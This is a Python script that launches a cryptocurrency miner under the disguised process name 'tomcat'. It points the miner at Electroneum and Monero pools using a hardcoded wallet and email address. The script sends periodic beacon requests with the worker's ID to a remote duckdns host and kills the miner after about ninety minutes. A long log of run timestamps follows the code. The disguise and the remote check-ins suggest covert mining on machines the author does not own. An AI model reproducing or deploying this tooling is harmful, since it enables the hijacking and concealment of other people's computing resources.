import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:28:01.274583
#2018-02-17 17:15:01.480619
#2018-02-17 19:04:01.312648
#2018-02-17 20:51:06.019076
#2018-02-17 22:38:06.582127
#2018-02-18 00:21:05.288278
#2018-02-18 02:11:08.079962
#2018-02-18 04:00:01.569148
#2018-02-18 05:51:05.222541
#2018-02-18 07:42:05.217196
#2018-02-18 09:29:03.730492
#2018-02-18 11:16:04.423273
#2018-02-18 13:02:04.514692
#2018-02-18 14:50:07.460370
#2018-02-18 16:38:07.392149
#2018-02-18 18:27:05.998906
#2018-02-18 20:14:01.264731
#2018-02-18 21:59:07.280120
#2018-02-18 23:48:06.679536
#2018-02-19 01:34:06.022821
#2018-02-19 03:23:06.994978
#2018-02-19 05:08:06.401472
#2018-02-19 06:54:04.910481
#2018-02-19 08:42:06.213944
#2018-02-19 10:31:01.695244
#2018-02-19 12:19:01.777577
#2018-02-19 14:06:01.426754
#2018-02-19 15:54:01.788403
#2018-02-19 17:43:09.085111
#2018-02-19 19:31:06.137223
#2018-02-19 21:18:05.868109
#2018-02-19 23:03:07.536862
#2018-02-20 00:46:07.451876
#2018-02-20 02:36:07.644235
#2018-02-20 04:25:05.981331
#2018-02-20 06:09:06.870798
#2018-02-20 07:54:05.886031
#2018-02-20 09:39:06.583140
#2018-02-20 11:23:03.910878
#2018-02-20 13:09:08.507406
#2018-02-20 14:54:06.824796
#2018-02-20 16:40:11.664982
#2018-02-20 18:26:09.662275
#2018-02-20 20:17:08.017523
#2018-02-20 22:03:07.100836
#2018-02-20 23:45:07.035455
#2018-02-21 01:31:05.406012
#2018-02-21 03:20:03.127035
#2018-02-21 05:09:07.131429
#2018-02-21 06:57:01.613748
#2018-02-21 08:43:08.566294
#2018-02-21 10:28:03.927210
#2018-02-21 12:18:05.255012
#2018-02-21 14:07:05.180619
#2018-02-21 15:53:01.940899
#2018-02-21 17:44:09.912023
#2018-02-21 19:31:04.780371
#2018-02-21 21:18:05.287803
#2018-02-21 23:06:01.687668
#2018-02-22 00:53:04.184981
#2018-02-22 02:41:05.112423
#2018-02-22 04:27:01.689444
#2018-02-22 06:13:02.095564
#2018-02-22 07:57:04.777604
#2018-02-22 09:46:07.281646
#2018-02-22 11:31:07.257510
#2018-02-22 13:19:08.875980
#2018-02-22 15:08:07.125381
#2018-02-22 16:52:01.696837
#2018-02-22 18:40:09.319982
#2018-02-22 20:31:08.654468
#2018-02-22 22:16:08.100783
#2018-02-23 00:02:03.745204
#2018-02-23 03:29:07.016103
#2018-02-23 05:15:04.000772
#2018-02-23 07:02:05.068341
#2018-02-23 08:50:09.416532
#2018-02-23 11:08:08.921048
#2018-02-23 13:02:06.288417
#2018-02-23 14:46:08.455205
#2018-02-23 16:34:07.811895
#2018-02-23 18:22:01.820631
#2018-02-23 20:06:07.219331
#2018-02-23 21:52:03.582939
#2018-02-23 23:42:08.399197
#2018-02-24 01:32:07.452158
#2018-02-24 03:21:04.534373
#2018-02-24 05:05:08.485365
#2018-02-24 06:53:04.476864
#2018-02-24 08:44:03.799785
#2018-02-24 10:40:01.480482
#2018-02-24 12:29:02.081169
#2018-02-24 14:20:07.471802
#2018-02-24 16:07:04.004135
#2018-02-24 17:58:06.220514
#2018-02-24 19:46:05.838104
#2018-02-24 21:32:04.652974
#2018-02-25 00:18:05.471477
#2018-02-25 03:27:06.240454
#2018-02-25 06:05:06.396028
#2018-02-25 10:40:01.721715
#2018-02-25 12:13:02.936356
#2018-02-25 14:25:01.297372
#2018-02-25 16:01:01.777125